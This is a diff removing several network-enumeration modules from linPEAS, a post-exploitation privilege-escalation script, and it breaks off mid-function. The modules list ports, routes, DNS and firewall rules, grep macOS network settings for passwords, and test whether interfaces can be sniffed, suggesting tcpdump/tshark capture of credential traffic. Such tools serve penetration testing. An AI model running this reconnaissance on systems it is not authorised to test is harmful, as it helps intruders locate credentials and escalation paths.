-            echo "Hostname from /etc/hostname: $(cat /etc/hostname 2>/dev/null)"
-        fi
-    fi
-    echo ""
-}
-
-# Function to get hosts file information
-get_hosts_info() {
-    print_3title "Hosts File Information"
-    if [ -f "/etc/hosts" ]; then
-        echo "Contents of /etc/hosts:"
-        grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do
-            echo "  $line"
-        done
-    fi
-    echo ""
-}
-
-# Function to get DNS information
-get_dns_info() {
-    print_3title "DNS Configuration"
-    
-    # Get resolv.conf information
-    if [ -f "/etc/resolv.conf" ]; then
-        echo "DNS Servers (resolv.conf):"
-        grep -v "^#" /etc/resolv.conf 2>/dev/null | grep -v "^$" | while read -r line; do
-            if echo "$line" | grep -q "nameserver"; then
-                echo "  $(echo "$line" | awk '{print $2}')"
-            elif echo "$line" | grep -q "search\|domain"; then
-                echo "  $line"
-            fi
-        done
-    fi
-
-    # Check for systemd-resolved configuration
-    if [ -f "/etc/systemd/resolved.conf" ]; then
-        echo -e "\nSystemd-resolved configuration:"
-        grep -v "^#" /etc/systemd/resolved.conf 2>/dev/null | grep -v "^$" | while read -r line; do
-            echo "  $line"
-        done
-    fi
-
-    # Check for NetworkManager DNS settings
-    if [ -d "/etc/NetworkManager" ]; then
-        echo -e "\nNetworkManager DNS settings:"
-        find /etc/NetworkManager -type f -name "*.conf" 2>/dev/null | while read -r conf; do
-            if grep -q "dns=" "$conf" 2>/dev/null; then
-                echo "  From $conf:"
-                grep "dns=" "$conf" 2>/dev/null | while read -r line; do
-                    echo "    $line"
-                done
-            fi
-        done
-    fi
-
-    # Try to get DNS domain name
-    echo -e "\nDNS Domain Information:"
-    if command -v dnsdomainname >/dev/null 2>&1; then
-        warn_exec dnsdomainname 2>/dev/null
-    fi
-    if command -v domainname >/dev/null 2>&1; then
-        warn_exec domainname 2>/dev/null
-    fi
-
-    # Check for DNS cache status
-    if command -v systemd-resolve >/dev/null 2>&1; then
-        echo -e "\nDNS Cache Status (systemd-resolve):"
-        systemd-resolve --status 2>/dev/null | grep -A5 "DNS Servers" | grep -v "\-\-" | while read -r line; do
-            echo "  $line"
-        done
-    fi
-    echo ""
-}
-
-print_2title "Hostname, hosts and DNS"
-
-# Execute all information gathering functions
-get_hostname_info
-get_hosts_info
-get_dns_info
--- a/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
@ -1,138 +0,0 @@
-# Title: Network Information - Network neighbours
-# ID: NT_Network_neighbours
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Networks and neighbours
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title
-# Global Variables: $EXTRA_CHECKS, $MACPEAS
-# Initial Functions:
-# Generated Global Variables: $hwtype, $flags, $line, $iface, $dest, $ref, $use, $mask, $metric, $device, $hwaddr
-# Fat linpeas: 0
-# Small linpeas: 0
-
-# Function to parse routing information from /proc/net/route
-parse_proc_route() {
-    print_3title "Routing Table (from /proc/net/route)"
-    echo "Destination         Gateway         Genmask         Flags Metric Ref    Use Iface"
-    echo "--------------------------------------------------------------------------------"
-    # Skip header line and process each route
-    tail -n +2 /proc/net/route 2>/dev/null | while read -r line; do
-        if [ -n "$line" ]; then
-            # Extract fields
-            iface=$(echo "$line" | awk '{print $1}')
-            dest=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($2,7,2), substr($2,5,2), substr($2,3,2), substr($2,1,2)}'))
-            gw=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($3,7,2), substr($3,5,2), substr($3,3,2), substr($3,1,2)}'))
-            mask=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($4,7,2), substr($4,5,2), substr($4,3,2), substr($4,1,2)}'))
-            flags=$(echo "$line" | awk '{print $5}')
-            metric=$(echo "$line" | awk '{print $6}')
-            ref=$(echo "$line" | awk '{print $7}')
-            use=$(echo "$line" | awk '{print $8}')
-            
-            # Print formatted output
-            printf "%-18s %-15s %-15s %-6s %-6s %-6s %-6s %s\n" "$dest" "$gw" "$mask" "$flags" "$metric" "$ref" "$use" "$iface"
-        fi
-    done
-    echo ""
-}
-
-# Function to parse ARP information from /proc/net/arp
-parse_proc_arp() {
-    print_3title "ARP Table (from /proc/net/arp)"
-    echo "IP address       HW type     Flags     HW address           Mask     Device"
-    echo "------------------------------------------------------------------------"
-    # Skip header line and process each ARP entry
-    tail -n +2 /proc/net/arp 2>/dev/null | while read -r line; do
-        if [ -n "$line" ]; then
-            ip=$(echo "$line" | awk '{print $1}')
-            hwtype=$(echo "$line" | awk '{print $2}')
-            flags=$(echo "$line" | awk '{print $3}')
-            hwaddr=$(echo "$line" | awk '{print $4}')
-            mask=$(echo "$line" | awk '{print $5}')
-            device=$(echo "$line" | awk '{print $6}')
-            
-            # Print formatted output
-            printf "%-15s %-11s %-9s %-18s %-8s %s\n" "$ip" "$hwtype" "$flags" "$hwaddr" "$mask" "$device"
-        fi
-    done
-    echo ""
-}
-
-# Function to get network neighbors information
-get_network_neighbors() {
-    print_2title "Networks and neighbours"
-
-    # Get routing information
-    print_3title "Routing Information"
-    if [ "$MACPEAS" ]; then
-        # macOS specific
-        if command -v netstat >/dev/null 2>&1; then
-            netstat -rn 2>/dev/null
-        else
-            echo "No routing information available"
-        fi
-    else
-        # Linux systems
-        if command -v ip >/dev/null 2>&1; then
-            ip route 2>/dev/null
-            echo -e "\nNeighbor table:"
-            ip neigh 2>/dev/null
-        elif command -v route >/dev/null 2>&1; then
-            route -n 2>/dev/null
-        elif [ -f "/proc/net/route" ]; then
-            parse_proc_route
-        else
-            echo "No routing information available"
-        fi
-    fi
-
-    # Get ARP information
-    print_3title "ARP Information"
-    if command -v arp >/dev/null 2>&1; then
-        if [ "$MACPEAS" ]; then
-            arp -a 2>/dev/null
-        else
-            arp -e 2>/dev/null || arp -a 2>/dev/null
-        fi
-    elif [ -f "/proc/net/arp" ]; then
-        parse_proc_arp
-    else
-        echo "No ARP information available"
-    fi
-
-    # Additional neighbor discovery methods
-    print_3title "Additional Neighbor Information"
-    
-    # Check for IPv6 neighbors if available
-    if [ -f "/proc/net/ipv6_neigh" ]; then
-        echo "IPv6 Neighbors:"
-        cat /proc/net/ipv6_neigh 2>/dev/null | grep -v "^IP" | while read -r line; do
-            if [ -n "$line" ]; then
-                echo "  $line"
-            fi
-        done
-    fi
-
-    # Try to get LLDP neighbors if available
-    if command -v lldpctl >/dev/null 2>&1; then
-        echo -e "\nLLDP Neighbors:"
-        lldpctl 2>/dev/null | grep -A2 "Interface:" | while read -r line; do
-            echo "  $line"
-        done
-    fi
-
-    # Try to get CDP neighbors if available
-    if command -v cdp >/dev/null 2>&1; then
-        echo -e "\nCDP Neighbors:"
-        cdp 2>/dev/null | grep -v "^$" | while read -r line; do
-            echo "  $line"
-        done
-    fi
-
-    echo ""
-}
-
-if [ "$EXTRA_CHECKS" ]; then
-    get_network_neighbors
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
@ -1,177 +0,0 @@
-# Title: Network Information - Open ports
-# ID: NT_Open_ports
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Enumerate open ports
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, print_info
-# Global Variables: $E, $SED_RED
-# Initial Functions:
-# Generated Global Variables: $pid_dir, $tx_queue, $pid, $rem_port, $proc_file, $rem_ip, $local_ip, $rx_queue, $proto, $rem_addr, $program, $state, $header_sep, $proc_info, $inode, $header, $line, $local_addr, $local_port
-# Fat linpeas: 0
-# Small linpeas: 1
-
-# Function to get process info from inode
-get_process_info() {
-    local inode=$1
-    local pid=""
-    local program=""
-    
-    if [ -n "$inode" ]; then
-        for pid_dir in /proc/[0-9]*/fd; do
-            if [ -d "$pid_dir" ]; then
-                if ls -l "$pid_dir" 2>/dev/null | grep -q "$inode"; then
-                    pid=$(echo "$pid_dir" | awk -F/ '{print $3}')
-                    if [ -f "/proc/$pid/cmdline" ]; then
-                        program=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1)
-                        program=$(basename "$program")
-                    fi
-                    break
-                fi
-            fi
-        done
-    fi
-    echo "$pid/$program"
-}
-
-# Function to parse /proc/net/tcp and /proc/net/udp files
-parse_proc_net_ports() {
-    local proto=$1
-    local proc_file="/proc/net/$proto"
-    local header="Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name"
-    local header_sep="--------------------------------------------------------------------------------"
-
-    if [ -f "$proc_file" ]; then
-        print_3title "Active $proto Ports (from /proc/net/$proto)"
-        echo "$header"
-        echo "$header_sep"
-
-        # Process each connection using a pipe
-        tail -n +2 "$proc_file" 2>/dev/null | while IFS= read -r line; do
-            [ -z "$line" ] && continue
-            
-            # Skip header
-            case "$line" in
-                *"sl"*) continue ;;
-                *) : ;;
-            esac
-
-            # Extract fields using awk
-            sl=$(echo "$line" | awk '{print $1}')
-            local_addr=$(echo "$line" | awk '{print $2}')
-            rem_addr=$(echo "$line" | awk '{print $3}')
-            st=$(echo "$line" | awk '{print $4}')
-            tx_queue=$(echo "$line" | awk '{print $5}')
-            rx_queue=$(echo "$line" | awk '{print $6}')
-            uid=$(echo "$line" | awk '{print $7}')
-            inode=$(echo "$line" | awk '{print $10}')
-
-            # Convert hex IP:port to decimal
-            local_ip=$(printf "%d.%d.%d.%d" $(echo "$local_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
-            local_port=$(printf "%d" "0x$(echo "$local_addr" | awk -F: '{print $2}')")
-            rem_ip=$(printf "%d.%d.%d.%d" $(echo "$rem_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
-            rem_port=$(printf "%d" "0x$(echo "$rem_addr" | awk -F: '{print $2}')")
-
-            # Get process information
-            proc_info=$(get_process_info "$inode")
-
-            # Get state name
-            case $st in
-                "01") state="ESTABLISHED" ;;
-                "02") state="SYN_SENT" ;;
-                "03") state="SYN_RECV" ;;
-                "04") state="FIN_WAIT1" ;;
-                "05") state="FIN_WAIT2" ;;
-                "06") state="TIME_WAIT" ;;
-                "07") state="CLOSE" ;;
-                "08") state="CLOSE_WAIT" ;;
-                "09") state="LAST_ACK" ;;
-                "0A") state="LISTEN" ;;
-                "0B") state="CLOSING" ;;
-                "0C") state="NEW_SYN_RECV" ;;
-                *) state="UNKNOWN" ;;
-            esac
-
-            # Only show listening ports
-            if [ "$state" = "LISTEN" ]; then
-                # Format the output
-                printf "%-6s %-8s %-8s %-21s %-21s %-12s %s\n" \
-                    "$proto" "$rx_queue" "$tx_queue" "$local_ip:$local_port" "$rem_ip:$rem_port" "$state" "$proc_info"
-            fi
-        done
-    fi
-    echo ""
-}
-
-# Function to get open ports information
-get_open_ports() {
-    print_2title "Active Ports"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports"
-
-    # Try standard tools first
-    if command -v netstat >/dev/null 2>&1; then
-        print_3title "Active Ports (netstat)"
-        netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
-    elif command -v ss >/dev/null 2>&1; then
-        print_3title "Active Ports (ss)"
-        ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
-    else
-        # Fallback to parsing /proc/net files
-        parse_proc_net_ports "tcp"
-        parse_proc_net_ports "udp"
-    fi
-
-    # Additional port information
-    if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
-        print_3title "Additional Port Information"
-
-        # Check for listening ports in /proc/net/unix
-        if [ -f "/proc/net/unix" ]; then
-            echo "Unix Domain Sockets:"
-            # Use awk to process the file in one go, avoiding duplicates and empty paths
-            awk '$8 != "" && $8 != "@" && $8 != "00000000" {
-                inode=$7
-                socket=$8
-                # Find process using inode
-                cmd="find /proc/[0-9]*/fd -ls 2>/dev/null | grep " inode " | head -n1 | awk \"{print \\$11}\" | xargs -r readlink"
-                pid=""
-                while (cmd | getline pid_dir) {
-                    if (pid_dir != "") {
-                        split(pid_dir, parts, "/")
-                        pid=parts[3]
-                        break
-                    }
-                }
-                close(cmd)
-                if (pid != "") {
-                    cmd="tr \\0 \" \" < /proc/" pid "/cmdline 2>/dev/null | cut -d\" \" -f1 | xargs -r basename"
-                    cmd | getline prog
-                    close(cmd)
-                    if (prog != "") {
-                        print "  " socket " (" pid "/" prog ")"
-                    } else {
-                        print "  " socket " (" pid ")"
-                    }
-                } else {
-                    print "  " socket
-                }
-            }' /proc/net/unix 2>/dev/null | sort -u
-        fi
-
-        # Check for ports in use by systemd
-        if command -v systemctl >/dev/null 2>&1; then
-            echo -e "\nSystemd Socket Units:"
-            systemctl list-sockets 2>/dev/null | while IFS= read -r line; do
-                [ -z "$line" ] && continue
-                if ! echo "$line" | grep -q "UNIT\|listed"; then
-                    echo "  $line"
-                fi
-            done
-        fi
-    fi
-
-    echo ""
-}
-
-get_open_ports
--- a/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
@ -1,88 +0,0 @@
-# Title: Network Information - MacOS network capabilities
-# ID: NT_Macos_network_capabilities
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: MacOS network Capabilities
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, warn_exec
-# Global Variables: $MACPEAS, $EXTRA_CHECKS
-# Initial Functions:
-# Generated Global Variables: $net_service
-# Fat linpeas: 0
-# Small linpeas: 0
-
-# Function to get network capabilities information
-get_macos_network_capabilities() {
-    print_2title "Network Capabilities"
-
-    # Basic network information
-    echo ""
-    print_3title "Network Interfaces and Configuration"
-    warn_exec system_profiler SPNetworkDataType
-
-    # Network locations
-    echo ""
-    print_3title "Network Locations"
-    warn_exec system_profiler SPNetworkLocationDataType
-
-    # Network extensions
-    echo ""
-    print_3title "Network Extensions"
-    if [ -d "/Library/SystemExtensions" ]; then
-        warn_exec systemextensionsctl list
-    fi
-
-    # Network security
-    echo ""
-    print_3title "Network Security"
-    if command -v networksetup >/dev/null 2>&1; then
-        echo "Firewall Status:"
-        warn_exec networksetup -getglobalstate
-        echo -e "\nFirewall Rules:"
-        warn_exec networksetup -listallnetworkservices | while read -r net_service; do
-            if [ -n "$net_service" ]; then
-                echo "Service: $net_service"
-                warn_exec networksetup -getwebproxy "$net_service"
-                warn_exec networksetup -getsecurewebproxy "$net_service"
-                warn_exec networksetup -getproxybypassdomains "$net_service"
-            fi
-        done
-    fi
-
-    # Additional network information if EXTRA_CHECKS is enabled
-    if [ "$EXTRA_CHECKS" ]; then
-        # Network preferences
-        echo ""
-        print_3title "Network Preferences"
-        if [ -f "/Library/Preferences/SystemConfiguration/preferences.plist" ]; then
-            warn_exec plutil -p /Library/Preferences/SystemConfiguration/preferences.plist | grep -A 5 "NetworkServices"
-        fi
-        
-        # Network statistics
-        echo ""
-        print_3title "Network Statistics"
-        warn_exec netstat -s
-        
-        # Network routes
-        echo ""
-        print_3title "Network Routes"
-        warn_exec netstat -rn
-        
-        # Network interfaces details
-        echo ""
-        print_3title "Network Interfaces Details"
-        warn_exec ifconfig -a
-        
-        # Network kernel extensions
-        echo ""
-        print_3title "Network Kernel Extensions"
-        warn_exec kextstat | grep -i network
-    fi
-
-    echo ""
-}
-
-if [ "$MACPEAS" ]; then
-    get_macos_network_capabilities
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/6_Macos_network_services.sh
@ -1,164 +0,0 @@
-# Title: Network Information - MacOS Network Services
-# ID: NT_Macos_network_services
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Enumerate macos network services
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, warn_exec
-# Global Variables: $EXTRA_CHECKS, $MACPEAS, $E, $SED_RED
-# Initial Functions:
-# Generated Global Variables: $sharing_service, $profile, $port3, $service_count, $port1, $port, $services, $total, $port_list, $count, $ports, $active_ports, $port2
-# Fat linpeas: 0
-# Small linpeas: 0
-
-# Function to check if a port is listening
-check_listening_port() {
-    local port=$1
-    local service=$2
-    local count=0
-    
-    # Check both IPv4 and IPv6
-    count=$(netstat -na 2>/dev/null | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.${port}" | wc -l)
-    echo "$count"
-}
-
-# Function to get sharing services status
-get_sharing_services_status() {
-    print_2title "MacOS Sharing Services Status"
-    
-    # Define services and their ports using parallel arrays
-    services="Screen Sharing File Sharing Remote Login Remote Management Remote Apple Events Back to My Mac AirPlay Receiver AirDrop Bonjour Printer Sharing Internet Sharing"
-    ports="5900 88,445,548 22 3283 3031 4488 7000 5353 5353 515,631 67,68"
-
-    # Check each service
-    echo "Service Status (0=OFF, >0=ON):"
-    echo "--------------------------------"
-    
-    # Get number of services
-    service_count=$(echo "$services" | wc -w)
-    
-    # Loop through services using index
-    i=1
-    while [ $i -le $service_count ]; do
-        sharing_service=$(echo "$services" | cut -d' ' -f$i)
-        port_list=$(echo "$ports" | cut -d' ' -f$i)
-        total=0
-        active_ports=""
-        
-        # Check each port for the service
-        port1=$(echo "$port_list" | cut -d',' -f1)
-        port2=$(echo "$port_list" | cut -d',' -f2)
-        port3=$(echo "$port_list" | cut -d',' -f3)
-        for port in $port1 $port2 $port3; do
-            if [ -n "$port" ]; then
-                count=$(check_listening_port "$port" "$sharing_service")
-                if [ "$count" -gt 0 ]; then
-                    total=$((total + count))
-                    if [ -n "$active_ports" ]; then
-                        active_ports="${active_ports},"
-                    fi
-                    active_ports="${active_ports}${port}"
-                fi
-            fi
-        done
-        
-        # Print service status
-        if [ "$total" -gt 0 ]; then
-            printf "%-20s: ON  (Ports: %s)\n" "$sharing_service" "$active_ports" | sed -${E} "s,ON.*,${SED_RED},g"
-        else
-            printf "%-20s: OFF\n" "$sharing_service"
-        fi
-        
-        i=$((i + 1))
-    done
-    echo ""
-}
-
-# Function to get VPN information
-get_vpn_info() {
-    print_3title "VPN Information"
-    
-    # Get VPN configurations
-    warn_exec system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},g"
-    
-    # Check for VPN profiles
-    if [ -d "/Library/Preferences/SystemConfiguration" ]; then
-        echo -e "\nVPN Profiles:"
-        find /Library/Preferences/SystemConfiguration -name "*.plist" -exec grep -l "VPN" {} \; 2>/dev/null | while read -r profile; do
-            echo "Profile: $profile"
-            warn_exec plutil -p "$profile" | grep -A 5 "VPN"
-        done
-    fi
-    echo ""
-}
-
-# Function to get firewall information
-get_firewall_info() {
-    print_3title "Firewall Information"
-    
-    # Get firewall status
-    warn_exec system_profiler SPFirewallDataType
-    
-    # Get application firewall rules
-    if command -v /usr/libexec/ApplicationFirewall/socketfilterfw >/dev/null 2>&1; then
-        echo -e "\nApplication Firewall Rules:"
-        warn_exec /usr/libexec/ApplicationFirewall/socketfilterfw --listapps
-    fi
-    
-    # Get pf firewall rules if available
-    if command -v pfctl >/dev/null 2>&1; then
-        echo -e "\nPF Firewall Rules:"
-        warn_exec pfctl -s rules 2>/dev/null
-    fi
-    echo ""
-}
-
-# Function to get additional network information
-get_additional_network_info() {
-    if [ "$EXTRA_CHECKS" ]; then
-        print_3title "Additional Network Information"
-        
-        # Bluetooth information
-        echo "Bluetooth Status:"
-        warn_exec system_profiler SPBluetoothDataType
-        
-        # Ethernet information
-        echo -e "\nEthernet Status:"
-        warn_exec system_profiler SPEthernetDataType
-        
-        # USB network adapters
-        echo -e "\nUSB Network Adapters:"
-        warn_exec system_profiler SPUSBDataType
-        
-        # Network kernel extensions
-        echo -e "\nNetwork Kernel Extensions:"
-        warn_exec kextstat | grep -i "network\|ethernet\|wifi\|bluetooth"
-        
-        # Network daemons
-        echo -e "\nNetwork Daemons:"
-        warn_exec launchctl list | grep -i "network\|vpn\|firewall\|sharing"
-    fi
-    echo ""
-}
-
-# Main function to get all network services information
-get_macos_network_services() {
-    if [ "$MACPEAS" ]; then
-        # Get sharing services status
-        get_sharing_services_status
-        
-        # Get VPN information
-        get_vpn_info
-        
-        # Get firewall information
-        get_firewall_info
-        
-        # Get additional network information if EXTRA_CHECKS is enabled
-        get_additional_network_info
-    fi
-}
-
-if [ "$MACPEAS" ]; then
-    get_macos_network_services
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/7_Tcpdump.sh
@ -1,168 +0,0 @@
-# Title: Network Information - Network Traffic Analysis
-# ID: NT_Tcpdump
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check network traffic analysis capabilities and tools
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, print_info, warn_exec
-# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN
-# Initial Functions:
-# Generated Global Variables: $tools_found, $tool, $interfaces, $interfaces_found, $iface, $cmd, $pattern, $patterns
-# Fat linpeas: 0
-# Small linpeas: 1
-
-# Function to check if a command exists and is executable
-check_command() {
-    local cmd=$1
-    if command -v "$cmd" >/dev/null 2>&1; then
-        if [ -x "$(command -v "$cmd")" ]; then
-            return 0
-        fi
-    fi
-    return 1
-}
-
-# Function to check if we can sniff on an interface
-check_interface_sniffable() {
-    local iface=$1
-    if timeout 1 tcpdump -i "$iface" -c 1 >/dev/null 2>&1; then
-        return 0
-    fi
-    return 1
-}
-
-# Function to check for promiscuous mode
-check_promiscuous_mode() {
-    local iface=$1
-    if ip link show "$iface" 2>/dev/null | grep -q "PROMISC"; then
-        return 0
-    fi
-    return 1
-}
-
-# Main function to check network traffic analysis capabilities
-check_network_traffic_analysis() {
-    print_2title "Network Traffic Analysis Capabilities"
-    
-    # Check for sniffing tools
-    echo ""
-    print_3title "Available Sniffing Tools"
-    tools_found=0
-    
-    if check_command tcpdump; then
-        echo "tcpdump is available" | sed -${E} "s,.*,${SED_GREEN},g"
-        tools_found=1
-        # Check tcpdump version and capabilities
-        warn_exec tcpdump --version 2>/dev/null | head -n 1
-    fi
-    
-    if check_command tshark; then
-        echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
-        tools_found=1
-        # Check tshark version
-        warn_exec tshark --version 2>/dev/null | head -n 1
-    fi
-    
-    if check_command wireshark; then
-        echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g"
-        tools_found=1
-    fi
-    
-    if [ $tools_found -eq 0 ]; then
-        echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g"
-    fi
-    
-    # Check network interfaces
-    echo ""
-    print_3title "Network Interfaces Sniffing Capabilities"
-    interfaces_found=0
-    
-    # Get list of network interfaces
-    if command -v ip >/dev/null 2>&1; then
-        interfaces=$(ip -o link show | awk -F': ' '{print $2}')
-    elif command -v ifconfig >/dev/null 2>&1; then
-        interfaces=$(ifconfig -a | grep -o '^[^ ]*:' | tr -d ':')
-    else
-        interfaces=$(ls /sys/class/net/ 2>/dev/null)
-    fi
-    
-    for iface in $interfaces; do
-        if [ "$iface" != "lo" ]; then  # Skip loopback
-            echo -n "Interface $iface: "
-            if check_interface_sniffable "$iface"; then
-                echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g"
-                interfaces_found=1
-                
-                # Check promiscuous mode
-                if check_promiscuous_mode "$iface"; then
-                    echo "  - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g"
-                fi
-                
-                # Get interface details
-                if [ "$EXTRA_CHECKS" ]; then
-                    echo "  - Interface details:"
-                    warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null
-                fi
-            else
-                echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g"
-            fi
-        fi
-    done
-    
-    if [ $interfaces_found -eq 0 ]; then
-        echo "No sniffable interfaces found" | sed -${E} "s,.*,${SED_RED},g"
-    fi
-    
-    # Check for sensitive traffic patterns if we have sniffing capabilities
-    if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then
-        echo ""
-        print_3title "Sensitive Traffic Detection"
-        print_info "Checking for common sensitive traffic patterns..."
-        
-        # List of sensitive traffic patterns to check
-        patterns="
-            - HTTP Basic Auth
-            - FTP credentials
-            - SMTP credentials
-            - MySQL/MariaDB traffic
-            - PostgreSQL traffic
-            - Redis traffic
-            - MongoDB traffic
-            - LDAP traffic
-            - SMB traffic
-            - DNS queries
-            - SNMP traffic
-            - Many more...
-        "
-        
-        echo "$patterns" | while read -r pattern; do
-            if [ -n "$pattern" ]; then
-                echo "$pattern"
-            fi
-        done
-        
-        print_info "To capture sensitive traffic, you can use:"
-        echo "tcpdump -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
-        echo "tshark -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g"
-    fi
-    
-    # Additional information
-    if [ "$EXTRA_CHECKS" ]; then
-        echo ""
-        print_3title "Additional Network Analysis Information"
-        
-        # Check for network monitoring tools
-        echo "Checking for network monitoring tools..."
-        for tool in nethogs iftop iotop nload bmon; do
-            if check_command "$tool"; then
-                echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
-            fi
-        done
-    fi
-    
-    echo ""
-}
-
-# Run the main function
-check_network_traffic_analysis
--- a/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/8_Iptables.sh
@ -1,210 +0,0 @@
-# Title: Network Information - Firewall Rules Analysis
-# ID: NT_Iptables
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Analyze firewall rules and configurations
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, warn_exec, echo_not_found
-# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
-# Initial Functions:
-# Generated Global Variables: $rules_file, $cmd, $tool, $config_file
-# Fat linpeas: 0
-# Small linpeas: 1
-
-# Function to check if a command exists and is executable
-check_command() {
-    local cmd=$1
-    if command -v "$cmd" >/dev/null 2>&1; then
-        if [ -x "$(command -v "$cmd")" ]; then
-            return 0
-        fi
-    fi
-    return 1
-}
-
-# Function to analyze iptables rules
-analyze_iptables() {
-    echo ""
-    print_3title "Iptables Rules"
-    
-    # Check if iptables is available
-    if ! check_command iptables; then
-        echo_not_found "iptables"
-        return
-    fi
-    
-    # Check if we have permission to list rules
-    if ! timeout 1 iptables -L >/dev/null 2>&1; then
-        echo "No permission to list iptables rules" | sed -${E} "s,.*,${SED_RED},g"
-        return
-    fi
-    
-    # Get iptables version
-    warn_exec iptables --version 2>/dev/null
-    
-    # List all chains and rules
-    echo -e "\nFilter Table Rules:"
-    warn_exec iptables -L -v -n 2>/dev/null
-    
-    echo -e "\nNAT Table Rules:"
-    warn_exec iptables -t nat -L -v -n 2>/dev/null
-    
-    echo -e "\nMangle Table Rules:"
-    warn_exec iptables -t mangle -L -v -n 2>/dev/null
-    
-    # Check for custom chains
-    echo -e "\nCustom Chains:"
-    warn_exec iptables -L -v -n | grep -E "^Chain [A-Za-z]" | grep -v "INPUT\|OUTPUT\|FORWARD\|PREROUTING\|POSTROUTING" 2>/dev/null
-    
-    # Check for saved rules
-    echo -e "\nSaved Rules:"
-    for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/iptables-save /etc/iptables.save; do
-        if [ -f "$rules_file" ]; then
-            echo "Found rules in $rules_file:"
-            warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
-        fi
-    done
-}
-
-# Function to analyze nftables rules
-analyze_nftables() {
-    echo ""
-    print_3title "Nftables Rules"
-    
-    # Check if nft is available
-    if ! check_command nft; then
-        echo_not_found "nftables"
-        return
-    fi
-    
-    # Check if we have permission to list rules
-    if ! timeout 1 nft list ruleset >/dev/null 2>&1; then
-        echo "No permission to list nftables rules" | sed -${E} "s,.*,${SED_RED},g"
-        return
-    fi
-    
-    # Get nftables version
-    warn_exec nft --version 2>/dev/null
-    
-    # List all rules
-    echo -e "\nNftables Ruleset:"
-    warn_exec nft list ruleset 2>/dev/null
-    
-    # Check for saved rules
-    echo -e "\nSaved Rules:"
-    for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do
-        if [ -f "$rules_file" ]; then
-            echo "Found rules in $rules_file:"
-            warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
-        fi
-    done
-}
-
-# Function to analyze firewalld rules
-analyze_firewalld() {
-    echo ""
-    print_3title "Firewalld Rules"
-    
-    # Check if firewall-cmd is available
-    if ! check_command firewall-cmd; then
-        echo_not_found "firewalld"
-        return
-    fi
-    
-    # Check if firewalld is running
-    if ! systemctl is-active firewalld >/dev/null 2>&1; then
-        echo "Firewalld is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
-        return
-    fi
-    
-    # Get firewalld version
-    warn_exec firewall-cmd --version 2>/dev/null
-    
-    # List all zones
-    echo -e "\nFirewalld Zones:"
-    warn_exec firewall-cmd --list-all-zones 2>/dev/null
-    
-    # List active zones
